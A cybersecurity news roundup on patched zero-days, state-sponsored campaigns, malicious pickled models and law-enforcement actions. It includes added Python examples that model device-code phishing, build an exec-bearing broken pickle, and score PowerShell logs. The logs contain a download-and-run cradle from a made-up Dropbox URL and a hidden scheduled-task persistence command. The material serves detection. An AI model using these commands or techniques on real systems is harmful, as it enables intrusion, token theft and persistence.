Microsoft patches over 60 security flaws, including actively exploited zero-days
Microsoft has released security updates addressing more than 60 vulnerabilities across its software products, with two flaws under active exploitation. The updates come as part of the company's regular Patch Tuesday release. The two actively exploited vulnerabilities are tracked as CVE-2025-21391 and CVE-2025-21418. The first one is a Windows Storage Elevation of Privilege Vulnerability, which could allow an attacker to delete targeted files on a system.
Security experts warn that CVE-2025-21391 could be chained with other flaws, enabling attackers to escalate privileges and perform additional malicious actions. The second vulnerability, CVE-2025-21418, is a privilege-escalation flaw in the Windows Ancillary Function Driver for WinSock (AFD.sys). Exploiting it can yield SYSTEM privileges, giving an attacker full control of the machine.
In related news, Israeli threat intelligence firm ClearSky Cyber Security said that a Chinese-linked APT group tracked as Mustang Panda has been exploiting a new Windows zero-day vulnerability. ClearSky described it as a "UI vulnerability": files extracted from compressed RAR archives remain hidden in Windows Explorer, where the extraction directory appears as an empty folder. Anyone who knows the exact path can still access and execute the files from the command line. ClearSky added that running 'attrib -s -h' on the extracted files results in a file of 'Unknown' type associated with an ActiveX component.
Apple fixes actively exploited iOS zero-day
Apple has issued an out-of-band security update for iOS and iPadOS to address a serious vulnerability that has reportedly been exploited in the wild. The flaw, tracked as CVE-2025-24200, is an authorization issue that could allow an attacker with physical access to disable USB Restricted Mode on a locked device. That mode blocks data connections over the device's port once the device has been locked for a period, so disabling it is valuable to anyone attempting a physical data extraction.
Ivanti has released security updates to fix multiple vulnerabilities in its Connect Secure (ICS), Policy Secure (IPS), and Cloud Services Application (CSA) products that could allow attackers to execute arbitrary code. Progress Software has also addressed high-severity flaws in its LoadMaster software that could let attackers run arbitrary system commands or download files. Palo Alto Networks patched a critical vulnerability (CVE-2025-0108) in PAN-OS that lets an unauthenticated attacker with network access to the management web interface bypass authentication. GreyNoise reported that it detected exploitation attempts a day after the flaw was disclosed.
Additionally, a Rapid7 investigation revealed that the attackers who exploited a zero-day vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products in December 2024 also likely took advantage of a previously unknown SQL injection flaw in PostgreSQL, tracked as CVE-2025-1094, that affects the PostgreSQL interactive terminal psql.
Also, Salt Typhoon, a Chinese state-sponsored group believed to operate on behalf of China's Ministry of State Security (MSS), has been observed exploiting two known vulnerabilities in Cisco devices, according to Recorded Future. Despite sanctions and public exposure for its previous attacks on US telecommunications companies, Salt Typhoon remains active, targeting telecom providers and universities in several countries. The group uses two vulnerabilities in the web UI of Cisco's IOS XE platform, CVE-2023-20198 and CVE-2023-20273, which Cisco disclosed in October 2023 after they had been exploited as zero-days. Internet-facing devices with the web UI reachable provide the initial access, so patching and keeping the HTTP server feature unreachable from untrusted networks remain the relevant checks.
Cybersecurity firm Arctic Wolf reported that threat actors began exploiting a recently discovered vulnerability in SonicWall firewalls this week, soon after proof-of-concept (PoC) code targeting the flaw was released. The vulnerability, identified as CVE-2024-53704, is a high-severity authentication bypass linked to a flaw in the SSLVPN authentication mechanism of SonicOS.
Russian Sandworm APT targets critical sectors in BadPilot multi-year campaign
A subgroup of the notorious Russian state-sponsored hacking group Sandworm, also known as 'Seashell Blizzard' or 'APT44', has been conducting a sophisticated, multi-year cyber-espionage campaign named 'BadPilot' against a wide range of critical organizations and governments around the world. The campaign consists of targeted attacks that exploit vulnerabilities in widely used IT infrastructure software, particularly remote-management products: flaws in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet FortiClient EMS (CVE-2023-48788) gave the group footholds in critical sectors in the United States, the United Kingdom, Ukraine, Europe, and Central and South Asia. Alongside older vulnerabilities in Microsoft Exchange (CVE-2021-34473) and Zimbra Collaboration (CVE-2022-41352), the group deployed custom web shells such as 'LocalOlive' for long-term persistence, which let it keep control of compromised networks and stage further exploitation.
In a separate report, EclecticIQ researchers warned that Sandworm has ramped up its attacks on Ukrainian systems with a malware campaign that preys on users of pirated software, targeting Windows users in Ukraine with trojanized Microsoft Key Management Service (KMS) activators and fake Windows updates.
Google Threat Intelligence Group (GTIG) said in a recent report that countries like Russia are increasingly relying on cybercriminal groups to support state objectives, such as Russia's war in Ukraine. This strategy offers several advantages, including lower costs and greater deniability for the state. Russian intelligence has reportedly strengthened ties with cybercriminals, using them to enhance intelligence gathering and further national goals since the start of the invasion of Ukraine. Cybercriminal gangs often buy resources like malware or credentials from illicit forums, which is cheaper and attracts less attention than developing them internally. The report also highlights the activities of Russian-backed groups such as UNC2589, Turla, APT29, and Conti, which have openly supported Russia.
Microsoft's Threat Intelligence Center has uncovered an ongoing and successful device code phishing campaign by a threat actor identified as Storm-2372. The threat actor is targeting a wide range of sectors, including governments, NGOs, IT, defense, telecoms, healthcare, education, and energy, across Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 has connections to Russian interests based on its victim selection and methods.
The campaign, active since August 2024, uses phishing lures that mimic popular messaging apps like WhatsApp, Signal, and Microsoft Teams. In a device code phishing attack, the attacker starts a legitimate OAuth 2.0 device authorization flow, sends the victim the resulting user code in a lure, and waits. When the victim enters the code at the genuine sign-in page and approves, the identity provider issues access and refresh tokens to the attacker's client, which then uses them to reach the victim's accounts and the data or services those accounts control.
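The exchange described above, as an added example that is not part of the original article or of Microsoft's report: a small stand-in for an OAuth 2.0 device authorization server (RFC 8628), the attacker's side of the flow, and a detection pass over constructed sign-in records. The server, its endpoint URL, the log field names and the corporate egress range are all assumptions made for the example, not a specific product's behaviour or schema.

```python
import secrets
import time
from dataclasses import dataclass, field


@dataclass
class DeviceAuthServer:
    """Minimal stand-in for an OAuth 2.0 device authorization server (RFC 8628).

    Constructed for this example; not Microsoft's identity platform. The endpoint
    URL and record fields are assumptions.
    """
    pending: dict = field(default_factory=dict)   # device_code -> pending request

    def device_authorization(self, client_id, scope):
        """Step 1: the attacker's client requests a device code and a user code."""
        device_code = secrets.token_urlsafe(32)
        user_code = secrets.token_hex(4).upper()   # short code the victim is asked to type
        self.pending[device_code] = {
            "client_id": client_id, "scope": scope, "user_code": user_code,
            "approved_by": None, "expires_at": time.time() + 900,
        }
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example.test/device",
                "expires_in": 900, "interval": 5}

    def user_approves(self, user_code, user):
        """Step 2: the victim visits the real verification page and enters the lure's code."""
        for rec in self.pending.values():
            if rec["user_code"] == user_code and rec["approved_by"] is None:
                rec["approved_by"] = user
                return True
        return False

    def token(self, device_code):
        """Step 3: the attacker polls the token endpoint; after approval it receives tokens."""
        rec = self.pending.get(device_code)
        if rec is None or time.time() > rec["expires_at"]:
            return {"error": "expired_token"}
        if rec["approved_by"] is None:
            return {"error": "authorization_pending"}
        del self.pending[device_code]
        return {"access_token": f"at-{secrets.token_hex(8)}",
                "refresh_token": f"rt-{secrets.token_hex(8)}",
                "scope": rec["scope"], "subject": rec["approved_by"]}


def simulate_device_code_phish(server, victim):
    """Run the exchange end to end from the attacker's side."""
    req = server.device_authorization(client_id="mail-client", scope="Mail.Read offline_access")
    lure = (f"You have been invited to a Teams meeting. To join, open "
            f"{req['verification_uri']} and enter code {req['user_code']}.")
    first_poll = server.token(req["device_code"])        # victim has not acted yet
    assert first_poll == {"error": "authorization_pending"}
    # The victim follows the lure. To the identity provider this is a legitimate
    # sign-in by the real user on the real login page, MFA included.
    server.user_approves(req["user_code"], victim)
    tokens = server.token(req["device_code"])             # issued to the attacker's client
    return {"lure": lure, **tokens}


# Constructed sign-in records. Field names loosely follow what an IdP sign-in log
# exposes; they are assumptions, not a specific product's schema.
SAMPLE_SIGNIN_LOGS = [
    {"userPrincipalName": "alice@example.test", "authenticationProtocol": "deviceCode",
     "ipAddress": "203.0.113.7", "appDisplayName": "Microsoft Office"},
    {"userPrincipalName": "bob@example.test", "authenticationProtocol": "oAuth2",
     "ipAddress": "198.51.100.20", "appDisplayName": "Microsoft Teams"},
    {"userPrincipalName": "carol@example.test", "authenticationProtocol": "deviceCode",
     "ipAddress": "198.51.100.21", "appDisplayName": "Azure CLI"},
]
KNOWN_EGRESS_PREFIXES = ("198.51.100.",)   # assumed corporate egress range


def detect_device_code_signins(logs, known_prefixes=KNOWN_EGRESS_PREFIXES):
    """Flag device-code redemptions from outside known egress ranges.

    In this model the token endpoint is polled by the attacker's client, so the
    address seen at redemption is not the victim's machine; that is the signal the
    victim's own, legitimate-looking approval does not give.
    """
    return [r for r in logs
            if r["authenticationProtocol"] == "deviceCode"
            and not r["ipAddress"].startswith(known_prefixes)]


if __name__ == "__main__":
    print(simulate_device_code_phish(DeviceAuthServer(), "alice@example.test")["lure"])
    print(detect_device_code_signins(SAMPLE_SIGNIN_LOGS))
```

The point the simulation makes is that nothing in the flow is broken: the victim signs in on the genuine page and the server does exactly what the specification says. Defences therefore sit in policy (restricting or blocking the device code grant for users who do not need it, revoking refresh tokens on suspicion) and in review of device-code sign-ins, not in the authentication step itself.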
North Korean Kimsuky adopted a new tactic to infiltrate targets
The North Korean state-sponsored group known as Emerald Sleet (aka Kimsuky or Velvet Chollima) has adopted a new tactic: tricking targets into running PowerShell commands as administrator, which installs malicious software and gives the attackers remote access to the compromised system. According to Microsoft Threat Intelligence, the approach starts with spear-phishing designed to establish trust before the malicious instructions are delivered.
Another Kimsuky campaign, tracked as 'DEEP#DRIVE', has been targeting South Korean businesses, government entities, and the cryptocurrency sector. It relies on PowerShell scripts for payload delivery, reconnaissance, and malware execution, uses Dropbox both to distribute payloads and to exfiltrate data from compromised systems, establishes persistence through scheduled tasks, and obfuscates its code to avoid detection.
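One way to turn the tradecraft described in the two paragraphs above (PowerShell delivery, Dropbox hosting, scheduled-task persistence, obfuscation) into a detection pass over logged command lines, as an added example that is not part of the article or of any published Microsoft or Securonix rule. The indicator patterns, their weights, the threshold and the sample log lines are all constructed for this example; the decoding of `-EncodedCommand` arguments is the part worth copying, since indicators hidden inside a base64 blob are invisible to a plain pattern match.

```python
import base64
import re

# Indicator patterns with weights. Constructed for this example; they reflect the
# tradecraft the text describes, not a published detection rule.
INDICATORS = {
    r"(?i)invoke-expression|\biex\b":                                        ("inline execution", 3),
    r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b":            ("download cradle", 2),
    r"(?i)dropbox(?:usercontent)?\.com":                                     ("Dropbox used for delivery/exfil", 3),
    r"(?i)schtasks(?:\.exe)?\s+/create|register-scheduledtask":              ("scheduled-task persistence", 4),
    r"(?i)frombase64string|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}": ("base64 obfuscation", 2),
    r"(?i)-executionpolicy\s+bypass|-w(?:indowstyle)?\s+hidden|-noprofile": ("evasion switches", 1),
}
ENCODED_RE = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")


def decode_encoded_commands(text):
    """Decode -EncodedCommand arguments (base64 of UTF-16LE) so indicators inside them are visible."""
    decoded = []
    for b64 in ENCODED_RE.findall(text):
        try:
            decoded.append(base64.b64decode(b64, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def score_script_block(text, threshold=5):
    """Score one logged PowerShell command line or script block."""
    views = [text] + decode_encoded_commands(text)   # scan the raw line and any decoded payloads
    hits, score = [], 0
    for pattern, (label, weight) in INDICATORS.items():
        if any(re.search(pattern, view) for view in views):
            hits.append(label)
            score += weight
    return {"score": score, "hits": hits, "verdict": "suspicious" if score >= threshold else "benign"}


def _encode(cmd):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample log lines (not real DEEP#DRIVE artifacts; URLs and paths are made up).
SAMPLE_BLOCKS = [
    "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('https://dl.dropboxusercontent.com/s/abc123/stage2.ps1')"),
    'schtasks /create /tn "SystemUpdate" /tr "powershell -NoProfile -w hidden -File C:\\Users\\Public\\u.ps1" /sc minute /mo 30',
    "Get-Service | Where-Object Status -eq 'Running' | Export-Csv C:\\temp\\services.csv",
]


if __name__ == "__main__":
    for block in SAMPLE_BLOCKS:
        print(score_script_block(block))
```

Run against PowerShell script block logging (event ID 4104) or process creation events with command lines, the first sample scores on every indicator only because the encoded command was decoded first; the second scores on persistence plus the hidden-window switch; the administrative one-liner scores zero.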
Threat actors target IIS servers in Asia to spread BadIIS malware
Trend Micro researchers have uncovered a new malicious campaign targeting Internet Information Services (IIS) servers across multiple Asian countries. The attackers, believed to be financially motivated, deploy the BadIIS malware on compromised servers to manipulate search engine optimization (SEO) results.
The malicious campaign, which targets IIS servers in countries including India, Thailand, Vietnam, the Philippines, Singapore, Taiwan, South Korea, Japan, and Brazil, has been linked to a range of illicit activities. These activities include redirecting users to illegal gambling websites and potentially connecting them to rogue servers that either spread malware or harvest user credentials.
Elastic Security Labs has been monitoring a cyber campaign, tracked as REF7707, targeting the foreign ministry of a South American country, with potential links to other cyber compromises in Southeast Asia. The campaign features a sophisticated, novel intrusion set involving a slew of new malware families, named Finaldraft, Guidloader, and Pathloader.
Chinese espionage tools observed in ransomware attacks
A China-based threat actor, known as Emperor Dragonfly, has been linked to a ransomware attack using espionage tools. In late 2024, the group deployed RA World ransomware against an Asian software company, demanding a $2 million ransom. The tools used in the attack were previously associated with espionage campaigns, often targeting government ministries and telecom operators in Southeast Europe and Asia. The attackers exploited a vulnerability in Palo Alto PAN-OS (CVE-2024-0012) to infiltrate the network and deployed the Korplug backdoor through DLL sideloading. Symantec researchers note that Chinese state-backed operatives may also engage in cybercrime for personal gain.
Malicious ML models exploit Pickle serialization flaw to evade detection on Hugging Face
Cybersecurity researchers have uncovered two malicious machine learning (ML) models hosted on Hugging Face, a popular hub for hosting and sharing ML models, that used "broken" pickle files to evade detection systems. Python's pickle loader executes opcodes as it reads them, so a payload placed at the start of the stream runs before the loader reaches the malformed bytes and fails, while a scanner that insists on a fully parseable file never sees it. The malicious payload was a typical platform-aware reverse shell that connects to a hard-coded IP address, which suggests the models were intended to open backdoors into compromised systems and give attackers remote control of the victim's machine.
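The mechanism above, as an added example that is not part of the article or of the researchers' report: a constructed protocol-0 pickle whose payload (a harmless `builtins.exec` call that sets an environment variable, standing in for the reverse shell) is followed by invalid bytes instead of a STOP opcode. Loading it with `pickle.loads` runs the payload and then raises; a scanner that walks the opcode stream with `pickletools.genops` and keeps what it saw before the parse error still catches the dangerous import, whereas one that treats an unparseable file as not scannable reports nothing. The dangerous-import list and verdict labels are this example's own choices.

```python
import os
import pickle
import pickletools

# Constructed demo payload, not the real Hugging Face artifacts: a protocol-0 pickle
# that imports builtins.exec, calls it with a harmless one-liner, and then trails off
# into invalid bytes where the STOP opcode should be.
PAYLOAD_CODE = "import os; os.environ['PICKLE_DEMO'] = 'executed'"
BROKEN_PICKLE = (
    b"cbuiltins\nexec\n"                                  # GLOBAL: push builtins.exec
    + b"(" + b"S" + repr(PAYLOAD_CODE).encode() + b"\n"   # MARK, then STRING argument
    + b"t"                                                # TUPLE: (PAYLOAD_CODE,)
    + b"R"                                                # REDUCE: exec(PAYLOAD_CODE) runs here
    + b"\xff\xfe not a valid opcode, no STOP"             # stream breaks after the payload ran
)
CLEAN_PICKLE = pickle.dumps({"weights": [0.1, 0.2, 0.3]})   # ordinary data, for comparison

DANGEROUS_GLOBALS = {
    ("builtins", "exec"), ("builtins", "eval"), ("builtins", "compile"),
    ("builtins", "__import__"), ("builtins", "getattr"),
    ("os", "system"), ("os", "popen"), ("os", "execv"), ("posix", "system"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "check_output"),
    ("socket", "socket"), ("runpy", "run_path"),
}
CALL_OPCODES = {"REDUCE", "BUILD", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def demo_broken_pickle_still_executes():
    """Unpickle the broken stream; return (payload_ran, exception_type_name)."""
    os.environ.pop("PICKLE_DEMO", None)
    error = None
    try:
        pickle.loads(BROKEN_PICKLE)
    except Exception as exc:          # UnpicklingError: invalid load key, '\xff'
        error = type(exc).__name__
    return os.environ.get("PICKLE_DEMO") == "executed", error


def scan_pickle(data):
    """Walk the opcode stream without executing it, keeping everything seen before a parse error."""
    findings, globals_seen, strings, calls = [], [], [], 0
    reached_stop, parse_error = False, None
    try:
        for opcode, arg, pos in pickletools.genops(data):
            if opcode.name == "GLOBAL":                   # proto 0-3: "module name" in the arg
                module, name = arg.split(" ", 1)
            elif opcode.name == "STACK_GLOBAL":           # proto 4+: module and name pushed as strings
                module, name = (strings[-2], strings[-1]) if len(strings) >= 2 else ("?", "?")
            else:
                if isinstance(arg, str):
                    strings.append(arg)
                if opcode.name in CALL_OPCODES:
                    calls += 1
                if opcode.name == "STOP":
                    reached_stop = True
                continue
            globals_seen.append(f"{module}.{name}")
            if (module, name) in DANGEROUS_GLOBALS:
                findings.append(f"{module}.{name} at offset {pos}")
    except ValueError as exc:         # genops raises on an unknown opcode or a truncated stream
        parse_error = str(exc)
    if findings:
        verdict = "malicious"
    elif parse_error or not reached_stop:
        verdict = "suspicious: broken stream"
    else:
        verdict = "clean"
    return {"verdict": verdict, "findings": findings, "globals": globals_seen,
            "calls": calls, "reached_stop": reached_stop, "parse_error": parse_error}


def naive_scan(data):
    """What a scanner that requires a fully parseable file does: parse first, judge second."""
    try:
        ops = list(pickletools.genops(data))
    except ValueError:
        return "unparsable, skipped"   # the payload is never inspected
    bad = [op for op, arg, _ in ops
           if op.name == "GLOBAL" and tuple(arg.split(" ", 1)) in DANGEROUS_GLOBALS]
    return "malicious" if bad else "clean"


if __name__ == "__main__":
    print(demo_broken_pickle_still_executes())
    print(scan_pickle(BROKEN_PICKLE)["verdict"], "vs", naive_scan(BROKEN_PICKLE))
```

The practical rules follow from the first function: never load an untrusted pickle to inspect it, and treat a stream that fails to parse as at least suspicious rather than as out of scope. Safer formats for model weights avoid the problem entirely because they carry no executable opcodes.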
Netskope said it detected a large-scale phishing campaign that has been impacting thousands of users, with the goal of stealing credit card details for financial fraud. The campaign has been active since the latter half of 2024. Victims are primarily targeted while searching for documents through search engines, leading them to malicious PDFs. These PDFs contain a CAPTCHA image, which hides a phishing link that prompts users to enter sensitive information. All the harmful PDFs are hosted on the Webflow CDN.
In the meantime, website security company Sucuri warned of a new wave of attacks leveraging Google Tag Manager (GTM) to deliver a sophisticated credit card skimmer malware targeting Magento-based e-commerce websites.
US, UK, Australia sanction Russia-based Zservers over Lockbit ransomware attacks
The US, UK, and Australia imposed sanctions on Zservers, a Russia-based bulletproof hosting (BPH) provider that supports cybercriminals, including those behind Lockbit ransomware attacks. Zservers offers secure infrastructure that helps criminals evade law enforcement detection, facilitating cyberattacks on various targets, including critical sectors. The US Treasury’s Office of Foreign Assets Control (OFAC) sanctioned two key Russian nationals, Aleksandr Bolshakov and Aleksandr Mishin, for their roles as administrators of Zservers. The UK also imposed sanctions on Zservers, its employees, and the front company XHOST Internet Solutions LP.
Additionally, the Dutch Police (Politie) dismantled the ZServers/XHost bulletproof hosting operation after taking offline 127 servers used by the illegal platform.
In a separate action, four European hackers were arrested in a joint operation involving Thai, Swiss, and US authorities for orchestrating ransomware attacks that affected over 1,000 victims globally and caused around $16 million in damages. The operation, named "PHOBOS AETOR," led to the seizure of over 40 items, including digital devices containing critical evidence. The US Justice Department has also charged two Russian nationals, Roman Berezhnoy and Egor Glebov, who allegedly ran a cybercrime group that has used the Phobos ransomware since 2019.
SIM swapper pleads guilty in SEC social media hack that caused bitcoin price surge
A US citizen, Eric Council Jr., pleaded guilty to his role in the January 2024 unauthorized takeover of the SEC's social media account on X (formerly Twitter). Council collaborated with others to post a false announcement claiming the SEC had approved Bitcoin ETFs, causing Bitcoin's value to spike by over $1,000. The SEC quickly regained control and clarified the post was the result of a hack, leading to Bitcoin's value dropping by more than $2,000. Council and his co-conspirators used a fraudulent SIM swap to gain access to the SEC’s account, with Council impersonating a victim to execute the swap.
Two Estonian nationals, Sergei Potapenko and Ivan Turõgin, pleaded guilty to running a $577 million cryptocurrency Ponzi scheme through their service, HashFlare, which falsely promised customers profits from cryptocurrency mining. Between 2015 and 2019, the defendants sold mining contracts, but HashFlare lacked the necessary computing power to fulfill the claims. They used the proceeds to buy luxury real estate and vehicles. As part of their guilty pleas, they agreed to forfeit over $400 million in assets, which will be used to compensate victims. They face up to 20 years in prison, with sentencing scheduled for May 8.